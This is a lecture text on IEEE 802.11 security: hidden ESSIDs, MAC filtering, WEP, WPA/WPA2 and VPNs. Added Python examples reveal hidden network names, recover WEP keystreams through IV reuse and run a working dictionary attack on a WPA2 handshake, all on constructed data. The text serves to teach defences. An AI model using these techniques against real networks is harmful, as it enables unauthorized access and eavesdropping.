Security in IEEE 802.11 wireless networks

Piotr Polak
University Politehnica of Bucharest, December 2008
About IEEE 802.11
 IEEE 802.11 is a set of standards for building wireless local area
networks.
 IEEE 802.11 ensures interoperability between wireless devices from
different vendors.
 IEEE 802.11 is often called Wi-Fi; the expansion "Wireless Fidelity"
is a popular backronym that the Wi-Fi Alliance itself does not use.
 The Wi-Fi Alliance was founded in 1999 as WECA (Wireless Ethernet
Compatibility Alliance).
 In some countries the public uses "Wi-Fi" as a synonym for wireless
internet access (WLAN).
 Wi-Fi certified technologies are supported by nearly every modern
personal computer operating system, most game consoles, laptops,
smartphones and many printers and other peripherals.
About IEEE 802.11
 IEEE 802.11 uses licence-free (ISM) frequencies: 2400 to 2483.5 MHz
for 802.11b and 802.11g, and the 5 GHz band for 802.11a.
 The 2.4 GHz band is divided into up to 14 channels: 13 are usable in
Europe, 11 in the USA, and channel 14 only in Japan.
 Transmission speed depends on the devices used and the distance
between stations: 11 Mbps is the nominal 802.11b rate and 54 Mbps the
802.11a/g rate; 22, 44 and 108 Mbps are proprietary vendor extensions
that only work between devices of the same vendor.
Security principles
 Security means preventing unauthorized users from accessing the
network and encrypting all network traffic so that nobody outside the
network can sniff the information transmitted between users and/or
devices.
 A wireless network is inherently more exposed than a wired one: the
signal is transmitted through the air, so anyone within radio range
can receive every frame and inject frames without physical access to
the building. Confidentiality, integrity and access control therefore
have to come from the protocol (encryption and authentication), not
from the medium.
Basic methods
 Disabling the ESSID broadcast and changing the default network
ESSID set by the manufacturer
 MAC address filtering
 Assigning static IP addresses to devices
 Traffic encryption (WEP, WPA, WPA2)
 External authentication using a RADIUS server (802.1X, WPA/WPA2
Enterprise)
 VPN
 Limiting the range of the network
Disabling the ESSID broadcast
 Hiding the ESSID was introduced in the first Access Points as a
"protection method": the ESSID acted as the "password"
 The user must know and provide the ESSID (network identifier) to
connect to the network
 Not a real security method: the AP stops putting the name in its
beacons, but the name is still sent in cleartext in probe requests,
probe responses and association requests every time a client
connects, so a sniffer (Kismet, airodump-ng) learns it as soon as one
client joins
 Good for hiding the network from casual neighbours
 It can make clients less safe: a client configured for a hidden
network actively probes for it by name wherever it is, so an attacker
who learns the name can set up a malicious AP ("evil twin") with the
same ESSID in the neighbourhood, and the client will try to join it
MAC address filtering
 MAC (Media Access Control) addresses are unique identifiers assigned
to each network interface
 MAC filtering consists of creating a "white list" of accepted clients
 Only the registered clients can gain access to the network
 Should be used along with other protection methods: the 802.11
header carrying the sender's MAC address is never encrypted, even on
a WEP/WPA network, so an attacker can sniff the address of an allowed
client and "imitate" it (with Macshift on Windows, or `ifconfig` /
`ip link set ... address` on Unix-like systems)
 Only stops less experienced users
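The two previous points (hidden ESSID, MAC whitelist) share one root cause: 802.11 management frames are sent in cleartext. The following is an added example, not code from the original slides: it builds a small constructed "capture" of management frames (assumed BSSID, client MAC and network name) and parses them the way a sniffer does, recovering the hidden name from the probe/association exchange and listing the MAC addresses an attacker could clone.

```python
"""Added example (not from the original slides): parse constructed 802.11
management frames to show that a "hidden" ESSID and the MAC addresses of
whitelisted clients are both sent in cleartext."""
import struct

# 802.11 management frame subtypes used below
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8
# bytes of fixed fields before the tagged parameters, per subtype
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4, PROBE_REQ: 0}
MAC_HDR = struct.Struct("<HH6s6s6sH")  # frame control, duration, addr1, addr2, addr3, seq ctrl

def ssid_tag(ssid: bytes) -> bytes:
    """Information element 0 (SSID). A hidden network sends it with length 0."""
    return bytes([0, len(ssid)]) + ssid

def build_mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes) -> bytes:
    fc = subtype << 4          # type 0 = management, subtype in bits 4-7
    return MAC_HDR.pack(fc, 0, da, sa, bssid, 0) + body

def parse_mgmt_frame(frame: bytes) -> dict:
    fc, _, _, addr2, addr3, _ = MAC_HDR.unpack_from(frame)
    subtype = (fc >> 4) & 0xF
    body = frame[MAC_HDR.size + FIXED_LEN[subtype]:]
    tags = {}
    i = 0
    while i + 2 <= len(body):           # walk the TLV list of information elements
        tid, tlen = body[i], body[i + 1]
        tags[tid] = body[i + 2:i + 2 + tlen]
        i += 2 + tlen
    return {"subtype": subtype, "sa": addr2.hex(":"), "bssid": addr3.hex(":"),
            "ssid": tags.get(0, b"")}

# --- constructed capture (assumed addresses and network name) -----------------
AP_BSSID = bytes.fromhex("00aabbccddee")
CLIENT = bytes.fromhex("0011223344cc")   # a MAC on the AP's whitelist
BROADCAST = b"\xff" * 6
ZERO12, ZERO4 = b"\x00" * 12, b"\x00" * 4   # timestamp/interval/capabilities; capabilities/listen interval

CAPTURE = [
    build_mgmt_frame(BEACON, BROADCAST, AP_BSSID, AP_BSSID, ZERO12 + ssid_tag(b"")),            # hidden: empty SSID
    build_mgmt_frame(PROBE_REQ, BROADCAST, CLIENT, BROADCAST, ssid_tag(b"corp-wifi")),          # client asks for it by name
    build_mgmt_frame(PROBE_RESP, CLIENT, AP_BSSID, AP_BSSID, ZERO12 + ssid_tag(b"corp-wifi")),  # AP answers with the name
    build_mgmt_frame(ASSOC_REQ, AP_BSSID, CLIENT, AP_BSSID, ZERO4 + ssid_tag(b"corp-wifi")),    # and it is repeated here
]

def reveal_hidden_ssids(frames) -> dict:
    """Map each BSSID that beacons an empty SSID to the name leaked elsewhere."""
    hidden, names = set(), {}
    for p in map(parse_mgmt_frame, frames):
        if p["subtype"] == BEACON and p["ssid"] == b"":
            hidden.add(p["bssid"])
        elif p["subtype"] in (PROBE_RESP, ASSOC_REQ) and p["ssid"]:
            names[p["bssid"]] = p["ssid"].decode()
    return {b: names[b] for b in hidden if b in names}

def whitelisted_clients_seen(frames) -> list:
    """Source MACs of stations that probe or associate; the header is never
    encrypted, so any of these can be cloned to pass a MAC filter."""
    return sorted({p["sa"] for p in map(parse_mgmt_frame, frames)
                   if p["subtype"] in (PROBE_REQ, ASSOC_REQ)})

def probes_for(frames, ssid: bytes) -> list:
    """Clients probing for a name on their own: candidates for an evil-twin AP."""
    return sorted({p["sa"] for p in map(parse_mgmt_frame, frames)
                   if p["subtype"] == PROBE_REQ and p["ssid"] == ssid})

if __name__ == "__main__":
    print(reveal_hidden_ssids(CAPTURE))
    print(whitelisted_clients_seen(CAPTURE))
    print(probes_for(CAPTURE, b"corp-wifi"))
```

The beacon alone tells the sniffer only that a network with a zero-length name exists; the first probe response or association request gives the name away, and the same frames carry the client's MAC, which is exactly what a MAC filter trusts.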
Assigning static IP to devices
 Method similar to MAC address filtering
 Every device is registered: a static IP address is assigned to a
specific MAC address (a DHCP reservation) and the DHCP server hands
out no other addresses
 To be used along with a router having a good traffic policy: only
selected IPs can communicate with other hosts, etc.
 On its own it stops nobody: the addressing scheme is visible in ARP
and DHCP traffic, and an attacker simply configures a matching IP
address by hand
WEP
 Wired Equivalent Privacy was the confidentiality mechanism of the
original IEEE 802.11 standard ratified in September 1999
 Provides both (basic) shared-key authentication and encryption
 Standard 64-bit WEP uses a 40-bit key (also known as WEP-40), which
is concatenated with a 24-bit initialization vector (IV) to form the
RC4 per-packet key; the IV is sent in the clear in front of every
frame
 Broken by design, not only by key size: the 24-bit IV space (about
16 million values) is exhausted on a busy AP within hours, so
keystreams repeat and one known plaintext decrypts other frames; the
way the IV is prepended to the key lets statistical attacks on RC4
(FMS, KoreK, PTW) recover the key itself from a few tens of thousands
of captured frames. Integrity relies on an unkeyed CRC-32, so frames
can be modified without detection
 Uses static keys: the same shared key, typed once on every device,
is used for every frame and never rotated
 Longer keys (WEP-104, marketed as "128-bit") do not help: the IV
stays 24 bits and the key-recovery attacks still work, needing only
somewhat more captured frames
 Deprecated by IEEE 802.11i in 2004; must not be used
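The IV-reuse weakness described above, as an added example that is not part of the original slides: a minimal model of WEP encryption (RC4 keyed with IV||key, CRC-32 ICV, key-ID byte omitted) with a constructed shared key, IV and two frame payloads. An attacker who guesses the contents of one frame sent under a given IV (an ARP request is a classic choice) recovers the keystream and reads any other frame encrypted under the same IV, without ever learning the key.

```python
"""Added example (not from the original slides): a minimal WEP model showing
why a 24-bit IV breaks the cipher. Keys, IV and frame contents are constructed."""
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(payload: bytes) -> bytes:
    """WEP integrity check value: a plain CRC-32, no key involved."""
    return zlib.crc32(payload).to_bytes(4, "little")

def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (cleartext) || RC4(IV||key) XOR (payload || ICV).
    The key-ID byte that follows the IV in real frames is omitted."""
    body = payload + icv(payload)
    return iv + xor(body, rc4(iv + shared_key, len(body)))

def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + shared_key, len(body)))
    payload, tag = plain[:-4], plain[-4:]
    if tag != icv(payload):
        raise ValueError("ICV mismatch")
    return payload

# --- attacker side: no key needed ---------------------------------------------
def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Ciphertext XOR known plaintext = keystream for this IV (as many bytes
    as the known plaintext plus its ICV are long)."""
    return xor(frame[3:], known_payload + icv(known_payload))

def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    return xor(frame[3:], keystream)[:-4]

WEP_KEY = bytes.fromhex("0102030405")   # WEP-40 shared key, the same on every device
IV = bytes.fromhex("00002a")            # one of only 2^24 values, reused within hours on a busy AP
KNOWN = b"ARP request from 00:11:22:33:44:55: who has 192.168.1.1? tell 192.168.1.7"
SECRET = b"GET /admin?user=alice&pass=hunter2 HTTP/1.0"

def demo() -> bytes:
    """Two frames under the same IV: the predictable one (ARP) decrypts the other."""
    f_known = wep_encrypt(WEP_KEY, IV, KNOWN)
    f_secret = wep_encrypt(WEP_KEY, IV, SECRET)
    assert f_known[:3] == f_secret[:3]          # IV collision is visible in cleartext
    ks = recover_keystream(f_known, KNOWN)       # attacker guesses the ARP contents
    return decrypt_with_keystream(f_secret, ks)  # ... and reads the other frame

if __name__ == "__main__":
    print(demo())
```

The recovered keystream is valid for every frame that reuses this IV, and because the ICV is an unkeyed CRC the attacker can also flip bits in a captured frame and fix the CRC, which is why WEP fails on integrity as well as confidentiality.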
WPA/WPA2
 WPA (Wi-Fi Protected Access) was introduced by the Wi-Fi Alliance in
2003 as an interim replacement for weak WEP, designed so that
existing WEP hardware could support it through a firmware update
 WPA implemented a subset of the draft 802.11i standard: it keeps RC4
but wraps it in TKIP (per-packet keys, a 48-bit IV and the "Michael"
message integrity check)
 WPA2 (2004) implements the full IEEE 802.11i-2004 standard and uses
AES-based CCMP, which provides confidentiality, integrity and origin
authentication in one construction
 Both introduced dynamic keying: the 4-way handshake derives fresh
session keys (the PTK) from the master key and two nonces on every
connection, so the static-key problem of WEP is gone
 In Enterprise mode, 802.1X with the Extensible Authentication
Protocol (EAP) authenticates each user against a RADIUS server and
delivers a per-user master key; in Personal mode a pre-shared key
replaces this step
 Since March 2006 WPA2 certification has been mandatory for all new
devices bearing the Wi-Fi trademark
Personal WPA2
 For home and small office use
 Uses a PSK (Pre-Shared Key). The passphrase ("the password") used to
connect to the network may be 8 to 63 printable ASCII characters, or
the 256-bit key itself as 64 hexadecimal digits. The PSK is derived
from the passphrase and the ESSID with PBKDF2 (4096 iterations of
HMAC-SHA1), and every client shares the same key
 The 4-way handshake can be captured passively (or provoked by
deauthenticating a client), after which the passphrase can be guessed
offline at full CPU speed with no lockout; the ESSID acting as salt
only prevents one precomputed table from serving every network
 A random PSK of 13 characters or more is considered secure; shorter
or dictionary-based passphrases do not protect against brute force
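The 4-way handshake key derivation from the WPA/WPA2 slide and the offline attack on Personal WPA2 just described, as one added example that is not part of the original slides. It implements the real derivation chain (PBKDF2 to PMK, PRF-512 to PTK, HMAC-SHA1 MIC over EAPOL-Key message 2 for the CCMP suite) and then runs a wordlist against a "captured" message 2. The ESSID, MAC addresses, nonces, wordlist and passphrases are constructed here; the handshake is generated by the same code rather than sniffed.

```python
"""Added example (not from the original slides): WPA2-Personal key derivation
(PBKDF2 -> PMK, 4-way handshake -> PTK, EAPOL MIC) and the offline dictionary
attack it enables. The "captured" handshake is generated here, with an
assumed ESSID, MAC addresses, nonces and wordlist."""
import hashlib
import hmac
import struct

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the 4-way handshake inputs; bytes 0..15 are the KCK that signs EAPOL frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type .. key ID fields (77)

def build_eapol_msg2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with a zeroed MIC field.
    Key Information 0x010a: descriptor version 2 (HMAC-SHA1 MIC), pairwise, MIC bit."""
    body = struct.pack(">BHH8s32s16s8s8s16sH",
                       2, 0x010A, 16, b"\x00" * 7 + b"\x01", snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, b"\x00" * 16, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X v2, type 3 = EAPOL-Key

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC field zeroed) (CCMP suite)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def sign_eapol(kck: bytes, eapol: bytes) -> bytes:
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]

def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Offline attack: recompute the MIC for each candidate; nothing is sent to the AP."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None

# --- constructed "capture" ------------------------------------------------------
SSID = "home-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # real nonces are random; fixed here for reproducibility
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "sunshine1", "dragon"]

def simulate_handshake(passphrase: str) -> bytes:
    """What a sniffer sees as message 2 when a client with this passphrase connects."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return sign_eapol(kck, build_eapol_msg2(SNONCE))

def demo(passphrase: str):
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                     simulate_handshake(passphrase), WORDLIST)

if __name__ == "__main__":
    print(demo("sunshine1"))       # dictionary word: recovered
    print(demo("rV7#kqL2mZ9wP"))   # 13 random characters: not in any wordlist
```

Everything the attacker needs (ESSID, both MAC addresses, both nonces, the signed EAPOL frame) is in the clear in the handshake; only the PBKDF2 cost per guess slows the attack down, which is why the length and randomness of the passphrase is the whole defence in Personal mode.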
VPN
 VPN stands for Virtual Private Network
 A VPN creates secure tunnels between the client and the VPN server
 Provides user authentication and encryption of the traffic in
transit
 Can use compression to reduce bandwidth
 More resource expensive than WPA/WEP
 Some routers do not pass VPN traffic through (typically IPsec or
PPTP behind NAT)
Range of the network
 If you use a single device, position your Access Point in the middle
of the office/building so that the signal is distributed uniformly.
 Limit the transmit power so that the network is barely usable from
outside the office; this reduces the exposure to attacks from
outside. Otherwise anybody parked in front of your building can
attempt to connect to your network, and you will have little chance
of locating them.
 Range limiting only raises the bar: an attacker with a directional
antenna can receive a signal from hundreds of metres away that a
laptop cannot, so it must be combined with encryption and
authentication.
Conclusions
 For my home wireless network I use Personal WPA2 (AES) with a
randomly generated passphrase; the passphrase is changed
periodically and is 63 characters long. Moreover, all my devices are
registered in the MAC whitelist and have static IPs assigned by the
DHCP server.
 When I use public hotspots, no matter whether WPA is used or not, I
connect to the Internet using my own VPN server, so that even if the
traffic is sniffed at any of the pass-through points, all the data I
send and receive is safe.
 If I had to implement an enterprise network, I would use all the
protection methods described in the first point plus VPN, and I would
configure the AP/router in such a way that only VPN connections to
the VPN server are allowed. I find it simpler than RADIUS or
WPA2 Enterprise.
Conclusions
 Change your devices' default passwords and other sensitive settings
 Don't let any user extend the network by adding misconfigured
devices. Even a single unprotected Access Point can compromise the
security of the whole system.